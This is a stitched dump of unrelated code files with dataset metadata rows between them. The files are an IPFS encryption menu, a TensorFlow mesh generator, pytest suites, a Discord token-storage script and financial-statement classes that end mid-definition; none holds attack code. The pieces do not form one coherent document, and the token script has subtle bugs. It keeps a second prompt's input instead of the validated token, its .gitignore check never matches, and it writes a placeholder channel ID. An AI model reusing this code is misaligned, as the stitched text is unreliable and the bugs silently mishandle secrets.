print ' \x1b[1;96m\xe2\x95\xad\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xae\n \xe2\x94\x82 \x1b[1;91mERROR CHECK \x1b[1;90mGO \x1b[1;97mHOME \x1b[1;96m\xe2\x94\x82\n \xe2\x94\x9c\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xaf'
ty = raw_input(' \x1b[1;96m\xe2\x95\xb0\xe2\x9e\xa4 ')
if ty == '1':
os.system('exit')
else:
os.system('exit')
| 85.096774
| 1,273
| 0.649545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,460
| 0.845337
|
36a8051c9ed294e493f8410cbd5528938ce673ec
| 2,712
|
py
|
Python
|
main.py
|
anirudha-bs/Distributed_storage_ipfs
|
52fcf0f5b7b620dea059116d34ab0def56ce5cdd
|
[
"MIT"
] | null | null | null |
main.py
|
anirudha-bs/Distributed_storage_ipfs
|
52fcf0f5b7b620dea059116d34ab0def56ce5cdd
|
[
"MIT"
] | null | null | null |
main.py
|
anirudha-bs/Distributed_storage_ipfs
|
52fcf0f5b7b620dea059116d34ab0def56ce5cdd
|
[
"MIT"
] | null | null | null |
from files import write_key, load_key, encrypt, decrypt
import os
from ipfs import add,pin,get_file
def switch(option):
    """Dispatch a numeric menu option via the module-level ``switcher`` table,
    falling back to ``default`` for unknown options."""
    handler = switcher.get(option, default)
    return handler()
# Encrypts file and adds to ipfs
def encrypt_ipfs_add():
    """Encrypt a user-named file with the saved symmetric key and add it to IPFS.

    Creates a key on first use, appends "<file> - <ipfs result>" to a local
    ``ipfs_files`` ledger, and prints the result returned by ``add``.
    """
    file=input("Enter the file name to be added - ")
    # Look for saved key, if not found then create one
    try:
        key = load_key()
    except:
        write_key()
        key = load_key()
    #encrypt file
    encrypt(file,key)
    #returns file details added to ipfs
    res = add(file)
    # NOTE(review): the comment below mentions pinning, but pin() is never
    # called here (ipfs_add() does call it) — confirm whether that's intended.
    #pinning the file to mark it important
    print("Encrpted file was added to ipfs")
    try:
        f = open("ipfs_files","a")
        f.write("{} - {}\n".format(file, str(res)))
    except:
        print("IO error")
    print("File added to IPFS - " + str(res) + "\nThe filename and CID is stored in a file named IPFS_files for future references" )
def ipfs_add():
file=input("Enter the file name to be added - ")
res = add(file)
#pinning the file to mark it important
pin(file)
print("The file was added to ipfs")
print(res)
def decrypt_ipfs():
#hash of the file added to ipfs earlier
hash = input("Enter the hash of the file you want to retrive - ")
res = get_file(hash)
# Look for saved key, if not found then create one
try:
key = load_key()
except:
print("No key found")
exit(0)
decrypt(res,key)
#decrypted file will be saved as res.txt
print("THe file " + hash + " was successfully decrpted")
#function to get a file added to ipfs
def ipfs_get():
hash = input("Enter the hash of the file you want to retrive - ")
get_file(hash)
print("The file has been stored at res.txt ")
def sim_block():
print("Go to Blockchain_simulator directory and start the simulator by running go run .")
path = "blockchain_simulator/blocks.txt"
p_time = os.stat(path).st_mtime
while(1):
if os.stat(path).st_mtime > p_time:
p_time = os.stat(path).st_mtime
res = add(path)
print("New block detected , file updated in ipfs")
print(res)
def default():
return "Please select a valid option"
switcher = {
1: encrypt_ipfs_add,
2: ipfs_add,
3: decrypt_ipfs,
4: ipfs_get,
5: sim_block,
}
if __name__ == "__main__":
while(1):
print("\nDistributed storage\n -------Menu------ \n 1. Encrypt file and add to IPFS \n 2. Add file to ipfs without encryption \n 3. Decrypt a file from IPFS \n 4. Get file from IPFS \n 5. Simulate blockchain and add blocks to IPFS \n 6. Exit \n")
option = int(input())
switch(option)
if option==6:
break
| 30.133333
| 254
| 0.620206
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,277
| 0.47087
|
36a8576ce226acd209efa0c300493610cf449c81
| 4,730
|
py
|
Python
|
web-app/ZGenerator.py
|
IsaacGuan/SGSG
|
7476f1b8ec0ed90cd9896ee2d23241c4310cb78c
|
[
"MIT"
] | 2
|
2021-05-04T11:19:50.000Z
|
2021-05-16T01:37:08.000Z
|
web-app/ZGenerator.py
|
IsaacGuan/SGSG
|
7476f1b8ec0ed90cd9896ee2d23241c4310cb78c
|
[
"MIT"
] | null | null | null |
web-app/ZGenerator.py
|
IsaacGuan/SGSG
|
7476f1b8ec0ed90cd9896ee2d23241c4310cb78c
|
[
"MIT"
] | 1
|
2021-05-15T10:23:54.000Z
|
2021-05-15T10:23:54.000Z
|
import os
import tensorflow as tf
import numpy as np
import mcubes
from ops import *
class ZGenerator:
def __init__(self, sess, z_dim=128, ef_dim=32, gf_dim=128, dataset_name=None):
self.sess = sess
self.input_size = 64
self.z_dim = z_dim
self.ef_dim = ef_dim
self.gf_dim = gf_dim
self.dataset_name = dataset_name
self.real_size = 64
self.test_size = 32
self.batch_size = self.test_size*self.test_size*self.test_size
self.build_model()
def build_model(self):
self.z_vector = tf.placeholder(shape=[1,self.z_dim], dtype=tf.float32)
self.point_coord = tf.placeholder(shape=[self.batch_size,3], dtype=tf.float32)
self.point_value = tf.placeholder(shape=[self.batch_size,1], dtype=tf.float32)
self.zG = self.generator(self.point_coord, self.z_vector, phase_train=True, reuse=False)
self.loss = tf.reduce_mean(tf.square(self.point_value - self.zG))
self.saver = tf.train.Saver(max_to_keep=10)
def generator(self, points, z, phase_train=True, reuse=False):
with tf.variable_scope('simple_net') as scope:
if reuse:
scope.reuse_variables()
zs = tf.tile(z, [self.batch_size,1])
pointz = tf.concat([points,zs],1)
h1 = lrelu(linear(pointz, self.gf_dim*16, 'h1_lin'))
h1 = tf.concat([h1,pointz],1)
h2 = lrelu(linear(h1, self.gf_dim*8, 'h4_lin'))
h2 = tf.concat([h2,pointz],1)
h3 = lrelu(linear(h2, self.gf_dim*4, 'h5_lin'))
h3 = tf.concat([h3,pointz],1)
h4 = lrelu(linear(h3, self.gf_dim*2, 'h6_lin'))
h4 = tf.concat([h4,pointz],1)
h5 = lrelu(linear(h4, self.gf_dim, 'h7_lin'))
h6 = tf.nn.sigmoid(linear(h5, 1, 'h8_lin'))
return tf.reshape(h6, [self.batch_size,1])
def test(self, checkpoint_dir, batch_z, dim=64):
could_load, checkpoint_counter = self.load(checkpoint_dir)
if could_load:
print(' [*] Load SUCCESS')
else:
print(' [!] Load failed...')
return
dima = self.test_size
multiplier = int(dim/dima)
multiplier2 = multiplier*multiplier
multiplier3 = multiplier*multiplier*multiplier
aux_x = np.zeros([dima,dima,dima],np.int32)
aux_y = np.zeros([dima,dima,dima],np.int32)
aux_z = np.zeros([dima,dima,dima],np.int32)
for i in range(dima):
for j in range(dima):
for k in range(dima):
aux_x[i,j,k] = i*multiplier
aux_y[i,j,k] = j*multiplier
aux_z[i,j,k] = k*multiplier
coords = np.zeros([multiplier3,dima,dima,dima,3],np.float32)
for i in range(multiplier):
for j in range(multiplier):
for k in range(multiplier):
coords[i*multiplier2+j*multiplier+k,:,:,:,0] = aux_x+i
coords[i*multiplier2+j*multiplier+k,:,:,:,1] = aux_y+j
coords[i*multiplier2+j*multiplier+k,:,:,:,2] = aux_z+k
coords = (coords+0.5)/dim*2.0-1.0
coords = np.reshape(coords,[multiplier3,self.batch_size,3])
for t in range(batch_z.shape[0]):
model_float = np.zeros([dim+2,dim+2,dim+2],np.float32)
for i in range(multiplier):
for j in range(multiplier):
for k in range(multiplier):
minib = i*multiplier2+j*multiplier+k
model_out = self.sess.run(self.zG,
feed_dict={
self.z_vector: batch_z[t:t+1],
self.point_coord: coords[minib],
})
model_float[aux_x+i+1,aux_y+j+1,aux_z+k+1] = np.reshape(model_out, [dima,dima,dima])
thres = 0.2
vertices, triangles = mcubes.marching_cubes(model_float, thres)
return vertices, triangles
def load(self, checkpoint_dir):
import re
print(' [*] Reading checkpoints...')
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
counter = int(next(re.finditer('(\d+)(?!.*\d)',ckpt_name)).group(0))
print(' [*] Success to read {}'.format(ckpt_name))
return True, counter
else:
print(' [*] Failed to find a checkpoint')
return False, 0
| 37.539683
| 108
| 0.558774
| 4,642
| 0.981395
| 0
| 0
| 0
| 0
| 0
| 0
| 203
| 0.042918
|
36a935bd4ad858c3f4e568ba75cc0dc9d2989f18
| 2,410
|
py
|
Python
|
tests/crud/test_crud_user.py
|
congdh/fastapi-realworld
|
42c8630aedf594b69bc96a327b04dfe636a785fe
|
[
"MIT"
] | null | null | null |
tests/crud/test_crud_user.py
|
congdh/fastapi-realworld
|
42c8630aedf594b69bc96a327b04dfe636a785fe
|
[
"MIT"
] | null | null | null |
tests/crud/test_crud_user.py
|
congdh/fastapi-realworld
|
42c8630aedf594b69bc96a327b04dfe636a785fe
|
[
"MIT"
] | null | null | null |
import pytest
from faker import Faker
from fastapi.encoders import jsonable_encoder
from pydantic.types import SecretStr
from sqlalchemy.orm import Session
from app import crud, schemas
from app.core import security
def test_create_user(db: Session) -> None:
faker = Faker()
profile = faker.profile()
email = profile.get("mail", None)
username = profile.get("username", None)
password = "changeit"
user_in = schemas.UserCreate(
username=username, email=email, password=SecretStr(password)
)
user = crud.user.create(db=db, obj_in=user_in)
assert user.email == email
assert user.username == username
assert hasattr(user, "hashed_password")
assert security.verify_password(SecretStr(password), user.hashed_password)
def test_authenticate_user_success(db: Session) -> None:
faker = Faker()
profile = faker.profile()
email = profile.get("mail", None)
username = profile.get("username", None)
password = "changeit"
user_in = schemas.UserCreate(
username=username, email=email, password=SecretStr(password)
)
user = crud.user.create(db=db, obj_in=user_in)
wrong_email = email + "xxx"
authenticated_user = crud.user.authenticate(
db, email=wrong_email, password=SecretStr(password)
)
assert not authenticated_user
wrong_password = password + "xxx"
authenticated_user = crud.user.authenticate(
db, email=email, password=SecretStr(wrong_password)
)
assert not authenticated_user
authenticated_user = crud.user.authenticate(
db, email=email, password=SecretStr(password)
)
assert authenticated_user
assert user.email == authenticated_user.email
@pytest.mark.parametrize("search_by", ("email", "username", "id"))
def test_get_user_by(db: Session, search_by: str) -> None:
faker = Faker()
profile = faker.profile()
email = profile.get("mail", None)
username = profile.get("username", None)
password = "changeit"
user_in = schemas.UserCreate(
username=username, email=email, password=SecretStr(password)
)
user = crud.user.create(db=db, obj_in=user_in)
func_name = f"get_user_by_{search_by}"
func = getattr(crud.user, func_name)
user_2 = func(db, getattr(user, search_by))
assert user_2
assert user.email == user_2.email
assert jsonable_encoder(user) == jsonable_encoder(user_2)
| 31.298701
| 78
| 0.702075
| 0
| 0
| 0
| 0
| 695
| 0.288382
| 0
| 0
| 163
| 0.067635
|
36a9b87e26910ffc305f742982f6fa1a3f99417f
| 5,673
|
py
|
Python
|
tests/cli_test.py
|
de-code/layered-vision
|
5cb34ed2fb787fb1e3a8dd7ee7f4f932fe81c038
|
[
"MIT"
] | 5
|
2021-01-03T11:38:40.000Z
|
2021-08-31T19:33:02.000Z
|
tests/cli_test.py
|
de-code/layered-vision
|
5cb34ed2fb787fb1e3a8dd7ee7f4f932fe81c038
|
[
"MIT"
] | 41
|
2020-12-01T06:59:24.000Z
|
2022-03-31T13:23:23.000Z
|
tests/cli_test.py
|
de-code/layered-vision
|
5cb34ed2fb787fb1e3a8dd7ee7f4f932fe81c038
|
[
"MIT"
] | 2
|
2021-02-02T07:48:34.000Z
|
2021-05-29T21:19:34.000Z
|
from pathlib import Path
from typing import Union
import cv2
import pytest
from layered_vision.cli import (
parse_value_expression,
parse_set_value,
get_merged_set_values,
main
)
EXAMPLE_IMAGE_URL = (
r'https://raw.githubusercontent.com/numpy/numpy'
r'/v1.20.1/branding/logo/logomark/numpylogoicon.png'
)
def _quote_path(path: Union[str, Path]) -> str:
return repr(str(path))
def _load_image(path: Union[str, Path]):
image = cv2.imread(str(path))
if image is None:
raise FileNotFoundError('failed to load image: %r' % path)
return image
class TestParseValueExpression:
def test_should_parse_str(self):
assert parse_value_expression('abc') == 'abc'
def test_should_parse_int(self):
assert parse_value_expression('30') == 30
def test_should_parse_float(self):
assert parse_value_expression('30.1') == 30.1
def test_should_parse_false(self):
assert parse_value_expression('false') is False
def test_should_parse_true(self):
assert parse_value_expression('true') is True
class TestParseSetValue:
def test_should_parse_simple_expression(self):
assert parse_set_value('in.input_path=/path/to/input') == {
'in': {
'input_path': '/path/to/input'
}
}
def test_should_parse_int_value(self):
assert parse_set_value('in.fps=30') == {
'in': {
'fps': 30
}
}
def test_should_fail_with_missing_value(self):
with pytest.raises(ValueError):
assert parse_set_value('in.input_path')
def test_should_fail_with_missing_layer_id(self):
with pytest.raises(ValueError):
assert parse_set_value('input_path=/path/to/input')
class TestGetMergedSetValues:
def test_should_merge_properties_with_same_layer_id(self):
assert get_merged_set_values([
{'id1': {'prop1': 'value1'}},
{'id1': {'prop2': 'value2'}}
]) == {
'id1': {
'prop1': 'value1',
'prop2': 'value2'
}
}
def test_should_merge_properties_with_different_layer_id(self):
assert get_merged_set_values([
{'id1': {'prop1': 'value1'}},
{'id2': {'prop2': 'value2'}}
]) == {
'id1': {'prop1': 'value1'},
'id2': {'prop2': 'value2'}
}
class TestMain:
def test_should_copy_source_to_target_image(self, temp_dir: Path):
output_path = temp_dir / 'output.png'
config_file = temp_dir / 'config.yml'
config_file.write_text(
'''
layers:
- id: in
input_path: {input_path}
- id: out
output_path: {output_path}
'''.format(
input_path=_quote_path(EXAMPLE_IMAGE_URL),
output_path=_quote_path(output_path)
)
)
main(['start', '--config-file=%s' % config_file])
image = _load_image(output_path)
height, width, *_ = image.shape
assert width > 0
assert height > 0
def test_should_copy_and_resize_source_to_target_image(self, temp_dir: Path):
output_path = temp_dir / 'output.png'
config_file = temp_dir / 'config.yml'
config_file.write_text(
'''
layers:
- id: in
input_path: {input_path}
width: 320
height: 200
- id: out
output_path: {output_path}
'''.format(
input_path=_quote_path(EXAMPLE_IMAGE_URL),
output_path=_quote_path(output_path)
)
)
main(['start', '--config-file=%s' % config_file])
image = _load_image(output_path)
height, width, *_ = image.shape
assert (width, height) == (320, 200)
def test_should_copy_to_multiple_outputs(self, temp_dir: Path):
output_path_1 = temp_dir / 'output_1.png'
output_path_2 = temp_dir / 'output_2.png'
config_file = temp_dir / 'config.yml'
config_file.write_text(
'''
layers:
- id: in
input_path: {input_path}
width: 320
height: 200
- id: out_1
output_path: {output_path_1}
- id: out_2
output_path: {output_path_2}
'''.format(
input_path=_quote_path(EXAMPLE_IMAGE_URL),
output_path_1=_quote_path(output_path_1),
output_path_2=_quote_path(output_path_2)
)
)
main(['start', '--config-file=%s' % config_file])
for output_path in [output_path_1, output_path_2]:
image = _load_image(output_path)
height, width, *_ = image.shape
assert (width, height) == (320, 200)
def test_should_be_able_to_replace_input_and_output_path(self, temp_dir: Path):
output_path = temp_dir / 'output.png'
config_file = temp_dir / 'config.yml'
config_file.write_text(
'''
layers:
- id: in
input_path: "dummy"
- id: out
output_path: "dummy"
'''
)
main([
'start',
'--config-file=%s' % config_file,
'--set',
'in.input_path=%s' % EXAMPLE_IMAGE_URL,
'--set',
'out.output_path=%s' % output_path
])
image = _load_image(output_path)
height, width, *_ = image.shape
assert width > 0
assert height > 0
| 29.701571
| 83
| 0.559845
| 5,067
| 0.893178
| 0
| 0
| 0
| 0
| 0
| 0
| 1,512
| 0.266526
|
36aa46d45cf3ea3334546c1c84c23f98e38d06f3
| 5,958
|
py
|
Python
|
src/discordbot/writeToken.py
|
mavjav-edu/discordpy
|
c3da0903bd7772d089536f935a381b301efb8fd5
|
[
"MIT"
] | 1
|
2020-06-22T01:15:49.000Z
|
2020-06-22T01:15:49.000Z
|
src/discordbot/writeToken.py
|
mavjav-edu/discordpy
|
c3da0903bd7772d089536f935a381b301efb8fd5
|
[
"MIT"
] | 2
|
2020-09-24T20:34:37.000Z
|
2021-06-25T15:38:45.000Z
|
src/discordbot/writeToken.py
|
mavjav-edu/discordpy
|
c3da0903bd7772d089536f935a381b301efb8fd5
|
[
"MIT"
] | null | null | null |
import os
import re
import base64
import keyring
from cryptography.fernet import Fernet
# Make sure the key, Fernet objects within scope of future dependencies
# by setting to here (to nothing, for now)
frn = Fernet(base64.b64encode(bytes(list(range(32)))))
key = bytes(0)
if os.path.isfile('./key'): # Check the 'key' file already exists
# attempts to open a 'key' file where we store the Fernet key
# (`rb` means `Read Binary` from file)
keyf = open("key", 'rb')
key = keyf.read()
keyf.close() # close the key file
else:
# This is for when the 'key' file doesn't exist or was deleted
print("Key did not exist. Creating...")
# attempts to create/open a 'key' file where we store the
# Fernet key (wb+ means Write Binary to file with additional
# read privileges)
keyf = open("key", 'wb+')
# generates a Fernet key and saves that key to the 'key' file
key = Fernet.generate_key()
keyf.write(key)
keyf.close() # close the key file
# create Fernet object to do encryption using our key from above
frn = Fernet(key)
print("[1] Store bot token in key ring", "[2] Store bot token to disk")
question = "Should we keep token in keyring or store to disk? [1-2]>\n"
howToStoreToken = int(input(question))
correctToken = False
while not(howToStoreToken == 1 or howToStoreToken == 2):
howToStoreToken = int(input(question)) # Keep asking for a 1 or 2
# basic regex pattern checks on presumed token
correctToken = False
while not(correctToken):
token = input("What's the bot token? > ")
clientSecretPat = re.compile("^.{32}$")
clientIDPat = re.compile("^\d{18}$")
tokenPat = re.compile("^.{59}$")
wrong = "The string you've entered looks like the %s.\
Are you sure you copied the correct field?"
if tokenPat.match(token):
print("Token pattern matches! 👍🏽")
correctToken = True
continue
elif clientSecretPat.match(token):
print(wrong % "client secret")
continue
elif clientIDPat.match(token):
print(wrong % "client ID")
continue
if howToStoreToken == 1:
# ask the user for the Discord token, then writes the token as password
# into the keyring with the Fernet key as the username
keyring.set_password("system", key, (
input("What is the secret?> ")))
if not keyring.get_password("system", key.decode('utf-8')) is None:
print("Your token has been stored in the file system keyring!")
else:
print("Could not store token in the file system keyring!")
elif howToStoreToken == 2:
tokenFilename = input("What should be the token filename?> ")
while(os.path.isfile('./' + tokenFilename)):
print(tokenFilename, "already exists.\nChoose another name.")
tokenFilename = input("What should be the token filename?> ")
try:
# try-finally block for error `IOError` on opening token file for
# writing binary
# attempt to create/open a 'tokenFilename' file where we store the
# encrypted Discord token (we don't need to read 'tokenFilename'
# here, so we only need write privileges)
tokenf = open(tokenFilename, 'wb')
# ask the user for the Discord token, then encodes as binary, then
# encrypts the binary, and then writes binary to 'token' file
tokenf.write(frn.encrypt(str.encode(token)))
except PermissionError as error:
print(error, "\nCould not write token file. Check permissions.")
finally:
tokenf.close() # close the file `token`
if(os.path.isfile('./' + tokenFilename)):
print("Your token has been stored in a file!")
# read and write `.gitignore` to make sure we don't accidentally upload
# key or token
try:
# open `.gitignore` as a read only
gitignoref = open(".gitignore", 'r')
# store the content of `.gitignore`
gitignore = gitignoref.read()
# open `.gitignore` append mode (write starting at the end of the file)
gitignoref = open(".gitignore", 'a')
# regular expression pattern matching the word 'key' anywhere
keyRE = re.compile("key", re.MULTILINE)
# if the word 'key' is not found in the content of `.gitignore`
if(re.search(keyRE, gitignore) is None):
# then add 'key' to the next line in `.gitignore`
gitignoref.write("\nkey")
# if the word 'token' is not found in the content of `.gitignore`
if(howToStoreToken == "2"):
# regular expression pattern matching the word 'token' anywhere
tokenRE = re.compile(tokenFilename, re.MULTILINE)
if(re.search(tokenRE, gitignore) is None):
# then add 'key' to the next line in `.gitignore`
gitignoref.write("\n" + tokenFilename)
except PermissionError as error:
print(error, "\nCould not write gitignore file. Check permissions.")
finally:
# Below code will run in any event (whether there is an error or not)
gitignoref.close() # close the file `.gitignore`
# Change the mod-logs channel in `discordbot.py`
question = "What is your `mod-logs` channel ID?"
modlogsID = input(question)
channelIDRe = '\d{18}'
channelIDPat = re.compile("^" + channelIDRe + "$")
while not(channelIDPat.match(modlogsID)):
print("Input ID incorrect. See https://bit.ly/31q1Qlh for instructions.")
modlogsID = input(question)
if os.path.isfile("discordbot.py"):
discordbotf = open("discordbot.py", 'r')
discordbot = discordbotf.readlines()
discordbotf.close()
modlogsReComp = re.compile("(\s+modlogs = )(" + channelIDRe + ")(.*)")
for lineNum in range(len(discordbot)):
print(lineNum)
if re.search(modlogsReComp, discordbot[lineNum]):
discordbot[lineNum] = re.sub(
modlogsReComp, r"\1 012345678901234567 \3", discordbot[lineNum]
)
break
discordbotf = open("discordbot.py", 'w')
discordbotf.writelines(discordbot)
discordbotf.close()
| 36.777778
| 79
| 0.659785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,015
| 0.505533
|
36abaa99b236edf5ae7e28366041af627d5c697a
| 38,462
|
py
|
Python
|
Deprecated/three_stmts.py
|
FrankVolpe/SIMFIN
|
63631d8cc7a7f19570b21aa1f7c49995fa0765d7
|
[
"BSD-3-Clause"
] | 1
|
2019-07-29T04:35:25.000Z
|
2019-07-29T04:35:25.000Z
|
Deprecated/three_stmts.py
|
FrankVolpe/SIMFIN
|
63631d8cc7a7f19570b21aa1f7c49995fa0765d7
|
[
"BSD-3-Clause"
] | null | null | null |
Deprecated/three_stmts.py
|
FrankVolpe/SIMFIN
|
63631d8cc7a7f19570b21aa1f7c49995fa0765d7
|
[
"BSD-3-Clause"
] | 1
|
2020-12-23T23:26:17.000Z
|
2020-12-23T23:26:17.000Z
|
from base_classes import *
class income_statement(financial_statement):
''' __init__ will create the necessary accounts for an income statement.
--------------------------------------------------------------------------
No data must be added initially, use function add_data for this '''
def __init__(self, data=None):
####################################
## Final Line Of Income Statement ##
####################################
self.is_tid_58 = line_item('Net Income Available to Common Shareholders', 57)
####################################
## Net Income & Final Adjustments ##
####################################
self.is_tid_55 = line_item('Net Income',
54,
parent=self.is_tid_58)
self.is_tid_56 = line_item('Preferred Dividends',
55,
parent=self.is_tid_58)
self.is_tid_57 = line_item('Other Adjustments',
56,
parent=self.is_tid_58)
####################################
## Factoring In Minority Interest ##
####################################
self.is_tid_53 = line_item('Income (Loss) Including Minority Interest',
52,
parent=self.is_tid_55)
self.is_tid_54 = line_item('Minority Interest',
53,
parent=self.is_tid_55)
#########################
## Extraordinary Items ##
#########################
self.is_tid_50 = line_item('Net Extraordinary Gains (Losses)',
49,
parent=self.is_tid_53)
self.is_tid_51 = line_item(' Discontinued Operations',
50,
parent=self.is_tid_50)
self.is_tid_52 = line_item(' XO & Accounting Charges & Other',
51,
parent=self.is_tid_50)
########################
## Income After Taxes ##
########################
self.is_tid_49 = line_item('Income (Loss) from Continuing Operations',
48,
parent=self.is_tid_53)
self.is_tid_48 = line_item('Income (Loss) from Affiliates, net of taxes',
47,
parent=self.is_tid_49)
####################
## Pre-Tax Income ##
####################
self.is_tid_43 = line_item('Pretax Income (Loss)',
42,
parent=self.is_tid_49)
self.is_tid_28 = line_item('Pretax Income (Loss), Adjusted',
27,
parent=self.is_tid_43)
#################
## Tax Expense ##
#################
self.is_tid_44 = line_item('Income Tax (Expense) Benefit, net',
43,
parent=self.is_tid_49)
self.is_tid_45 = line_item(' Current Income Tax',
44,
parent=self.is_tid_44)
self.is_tid_46 = line_item(' Deferred Income Tax',
45,
parent=self.is_tid_44)
self.is_tid_47 = line_item(' Tax Allowance/Credit',
46,
parent=self.is_tid_44)
####################################
## Abnormal Activities & Children ##
####################################
self.is_tid_29 = line_item('Abnormal Gains (Losses)',
28,
parent=self.is_tid_43)
self.is_tid_30 = line_item(' Acquired In-Process R&D',
29,
parent=self.is_tid_29)
self.is_tid_31 = line_item(' Merger / Acquisition Expense',
30,
parent=self.is_tid_29)
self.is_tid_32 = line_item(' Abnormal Derivatives',
31,
parent=self.is_tid_29)
self.is_tid_33 = line_item(' Disposal of Assets',
32,
parent=self.is_tid_29)
self.is_tid_34 = line_item(' Early extinguishment of Debt',
33,
parent=self.is_tid_29)
self.is_tid_35 = line_item(' Asset Write-Down',
34,
parent=self.is_tid_29)
self.is_tid_36 = line_item(' Impairment of Goodwill & Intangibles',
35,
parent=self.is_tid_29)
self.is_tid_37 = line_item(' Sale of Business',
36,
parent=self.is_tid_29)
self.is_tid_38 = line_item(' Legal Settlement',
37,
parent=self.is_tid_29)
self.is_tid_39 = line_item(' Restructuring Charges',
38,
parent=self.is_tid_29)
self.is_tid_40 = line_item(' Sale of and Unrealized Investments',
39,
parent=self.is_tid_29)
self.is_tid_41 = line_item(' Insurance Settlement',
40,
parent=self.is_tid_29)
self.is_tid_42 = line_item(' Other Abnormal Items',
41,
parent=self.is_tid_29)
##############################
## Non-Operating Activities ##
##############################
self.is_tid_20 = line_item('Non-Operating Income (Loss)',
19,
parent=self.is_tid_28)
self.is_tid_21 = line_item(' Interest Expense, net',
20,
parent=self.is_tid_20)
self.is_tid_22 = line_item(' Interest Expense',
21,
parent=self.is_tid_21)
self.is_tid_23 = line_item(' Interest Income',
22,
parent=self.is_tid_21)
self.is_tid_24 = line_item(' Other Investment Income (Loss)',
23,
parent=self.is_tid_20)
self.is_tid_25 = line_item(' Foreign Exchange Gain (Loss)',
24,
parent=self.is_tid_20)
self.is_tid_26 = line_item(' Income (Loss) from Affiliates',
25,
parent=self.is_tid_20)
self.is_tid_27 = line_item(' Other Non-Operating Income (Loss)',
26,
parent=self.is_tid_20)
######################
## Operating Income ##
######################
self.is_tid_19 = line_item('Operating Income (Loss)',
18,
parent=self.is_tid_28)
self.is_tid_10 = line_item(' Other Operating Income',
9,
parent=self.is_tid_19)
###################################
## Operating Expenses & Children ##
###################################
self.is_tid_11 = line_item('Operating Expenses',
10,
parent=self.is_tid_19)
self.is_tid_12 = line_item(' Selling, General & Administrative',
11,
parent=self.is_tid_11)
self.is_tid_13 = line_item(' Selling & Marketing',
12,
parent=self.is_tid_12)
self.is_tid_14 = line_item(' General & Administrative',
13,
parent=self.is_tid_12)
self.is_tid_15 = line_item(' Research & Development',
14,
parent=self.is_tid_11)
self.is_tid_16 = line_item(' Depreciation & Amortization',
15,
parent=self.is_tid_11)
self.is_tid_17 = line_item(' Provision For Doubtful Accounts',
16,
parent=self.is_tid_11)
self.is_tid_18 = line_item(' Other Operating Expense',
17,
parent=self.is_tid_11)
##################
## Gross Profit ##
##################
self.is_tid_4 = line_item('Gross Profit',
8,
parent=self.is_tid_19)
##############################
## Cost of Sales & Children ##
##############################
self.is_tid_2 = line_item('Cost of revenue',
4,
parent=self.is_tid_4)
self.is_tid_7 = line_item(' Cost of Goods & Services',
5,
parent=self.is_tid_2)
self.is_tid_8 = line_item(' Cost of Financing Revenue',
6,
parent=self.is_tid_2)
self.is_tid_9 = line_item(' Cost of Other Revenue',
7,
parent=self.is_tid_2)
########################
## Revenue & Children ##
########################
self.is_tid_1 = line_item('Revenue',
0,
parent=self.is_tid_4)
self.is_tid_3 = line_item(' Sales & Services Revenue',
1,
parent=self.is_tid_1)
self.is_tid_5 = line_item(' Financing Revenue',
2,
parent=self.is_tid_1)
self.is_tid_6 = line_item(' Other Revenue',
3,
parent=self.is_tid_1)
if data:
self.add_data(data)
class cash_flow_statement(financial_statement):
''' __init__ will create the necessary accounts for a cash flow statement.
--------------------------------------------------------------------------
No data must be added initially, use function add_data for this '''
def __init__(self, data=None):
#######################################
## Final Line Of Cash Flow Statement ##
#######################################
self.cf_tid_46 = line_item('Net Changes in Cash', 51)
######################################
## Factoring In FX Gains and Losses ##
######################################
self.cf_tid_44 = line_item(' Effect of Foreign Exchange Rates',
50,
parent=self.cf_tid_46)
self.cf_tid_55 = line_item('Net Cash Before FX',
49,
parent=self.cf_tid_46)
##########################################
## Factoring in Discontinued Operations ##
##########################################
self.cf_tid_56 = line_item('Net Cash Before Disc. Operations and FX',
47,
parent=self.cf_tid_55)
self.cf_tid_45 = line_item(' Change in Cash from Disc. Operations and Other',
48,
parent=self.cf_tid_55)
####################################
## Cash From Operating Activities ##
####################################
self.cf_tid_13 = line_item('Cash from Operating Activities',
15,
parent=self.cf_tid_56)
###########################
## Net Income & Children ##
###########################
self.cf_tid_1 = line_item('Net Income/Starting Line',
0,
parent=self.cf_tid_13)
self.cf_tid_47 = line_item(' Net Income',
1,
parent=self.cf_tid_1)
self.cf_tid_48 = line_item(' Net Income From Discontinued Operations',
2,
parent=self.cf_tid_1)
self.cf_tid_49 = line_item(' Other Adjustments',
3,
parent=self.cf_tid_1)
###############################
## Non-Cash Items & Children ##
###############################
self.cf_tid_3 = line_item('Non-Cash Items',
5,
parent=self.cf_tid_13)
self.cf_tid_4 = line_item(' Stock-Based Compensation',
6,
parent=self.cf_tid_3)
self.cf_tid_5 = line_item(' Deferred Income Taxes',
7,
parent=self.cf_tid_3)
self.cf_tid_6 = line_item(' Other Non-Cash Adjustments',
8,
parent=self.cf_tid_3)
##########################################
## Change in Working Capital & Children ##
##########################################
self.cf_tid_7 = line_item('Change in Working Capital',
9,
parent=self.cf_tid_13)
self.cf_tid_8 = line_item(' (Increase) Decrease in Accounts Receivable',
10,
parent=self.cf_tid_7)
self.cf_tid_9 = line_item(' (Increase) Decrease in Inventories',
11,
parent=self.cf_tid_7)
self.cf_tid_10 = line_item(' Increase (Decrease) in Accounts Payable',
12,
parent=self.cf_tid_7)
